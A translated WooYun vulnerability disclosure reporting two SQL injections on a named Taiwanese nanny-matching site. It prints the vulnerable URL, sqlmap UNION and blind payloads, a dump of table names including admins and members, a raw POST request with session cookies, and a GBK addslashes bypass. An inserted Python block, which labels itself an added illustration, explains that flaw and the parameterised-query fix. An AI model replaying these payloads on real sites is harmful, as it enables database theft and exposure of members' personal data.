Vulnerability Summary

Defect ID: wooyun-2015-0129107

Title: Two SQL injections on the 108 Nanny Bank main site, bundled (UNION supported)

Vendor: Hitcon Taiwan Internet Vulnerability Reporting Platform

Author: 路人甲

Submitted: 2015-07-25 14:37

Fixed: 2015-09-10 18:24

Published: 2015-09-10 18:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed to a third-party partner organisation (Hitcon Taiwan Internet Vulnerability Reporting Platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability Details

Disclosure status:

2015-07-25: Details sent to the vendor, awaiting the vendor's response
2015-07-27: Vendor confirmed; details visible to the vendor only
2015-08-06: Details disclosed to core white hats and domain experts
2015-08-16: Details disclosed to regular white hats
2015-08-26: Details disclosed to intern white hats
2015-09-10: Details disclosed to the public

Brief description:

Detailed description:

0x01
http://www.108.com.tw/main04/108news/news_detail.php?Id=155

[Image: 1.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=155 AND 1743=1743
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: Id=-4946 UNION ALL SELECT NULL,CONCAT(0x71766a7871,0x4d6d4352664552787947,0x7170786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: com108_site
[46 tables]
+-------------------------------+
| restrict |
| admins |
| area |
| areacode |
| banner |
| banner1 |
| banner2 |
| banner3 |
| carerestrict |
| childminder |
| company |
| county |
| doctor_suggest |
| epaper |
| expert |
| job |
| ladychild |
| languagespeak |
| maillist_group |
| maillist_queue |
| member_restrict |
| memberchildminderno |
| memberno |
| members |
| members_childminder |
| members_childminder_appraisal |
| members_childminder_edu |
| members_childminder_exp |
| members_childminder_expert |
| members_childminder_homepage |
| members_childminder_job_exp |
| members_childminder_jobnow |
| members_childminder_photo |
| message_childminder |
| message_form_for_childminder |
| message_form_for_parent |
| message_members |
| messages_108_childminder |
| messages_108_members |
| news |
| news2 |
| news3 |
| parent_case |
| service |
| suggestion |
| visitor |
+-------------------------------+


0x02

POST /main04/members/members_childminder_add.php HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
Referer: http://www.108.com.tw:80/
Cookie: PHPSESSID=768821f907f29944e7d0d258c4c29b5c; admin_spiderpass=32cc5886dc1fa8c106a02056292c4654
Host: www.108.com.tw
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
act=add&identificationcard=1&passwd=g00dPa%24%24w0rD&passwd_comfirm=g00dPa%24%24w0rD

Parameter: identificationcard

Tamper script: unmagicquotes.py   Purpose: wide-character bypass of GPC addslashes
Input: 1' AND 1=1
Output: 1%bf%27 AND 1=1--%20
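The unmagicquotes behaviour above comes down to addslashes() and a GBK-encoded database connection disagreeing about where a character ends. The script below is an added illustration, not code from the report or from 108.com.tw: php_addslashes, unescaped_quotes and lookup_with_binding are names chosen here, the sample input is constructed, and SQLite stands in for MySQL only to show parameter binding.

```python
import sqlite3

# Added example (not part of the WooYun report or the 108.com.tw code base):
# why a GPC/addslashes() filter stops protecting a query once the connection
# charset is a multibyte one such as GBK, and what removes the problem.

def php_addslashes(data: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): a backslash is put before
    every ' " \\ and NUL byte, with no knowledge of the connection charset."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Decode the escaped bytes the way the DBMS would and count single
    quotes that no longer have a backslash in front of them. Under GBK the
    byte 0xBF is a lead byte and takes the 0x5C backslash as its trail
    byte, so the quote that follows is live again."""
    text = escaped.decode(charset, errors="replace")
    return sum(1 for i, ch in enumerate(text)
               if ch == "'" and (i == 0 or text[i - 1] != "\\"))


def lookup_with_binding(identificationcard: str) -> list:
    """Parameterised query (SQLite here for portability; PDO or mysqli
    prepared statements on MySQL behave the same): the value travels
    separately from the SQL text, so no byte sequence can alter the query."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (identificationcard TEXT)")
    con.execute("INSERT INTO members VALUES ('1')")  # constructed sample row
    return con.execute(
        "SELECT identificationcard FROM members WHERE identificationcard = ?",
        (identificationcard,),
    ).fetchall()


if __name__ == "__main__":
    raw = b"1\xbf' AND 1=1"          # constructed input: byte 0xBF then a quote
    esc = php_addslashes(raw)
    for cs in ("latin-1", "gbk"):
        print(cs, "unescaped quotes:", unescaped_quotes(esc, cs))
    print(lookup_with_binding("1"), lookup_with_binding("1\xbf' AND 1=1"))
```

For the PHP 5.2 application in the report, the durable fix is prepared statements; at minimum the escaping function must be told the connection charset (mysqli_set_charset) so that it, unlike addslashes(), respects multibyte boundaries.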


Proof of vulnerability:

Large amounts of member information

[Image: 2.png]

[Image: 11.png]

[Image: 12.png]

Not going any deeper.

Remediation:

Copyright notice: when reposting, credit the source: 路人甲@WooYun


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-07-27 18:22

Vendor reply:

Thanks for the notification!

Latest status:

None yet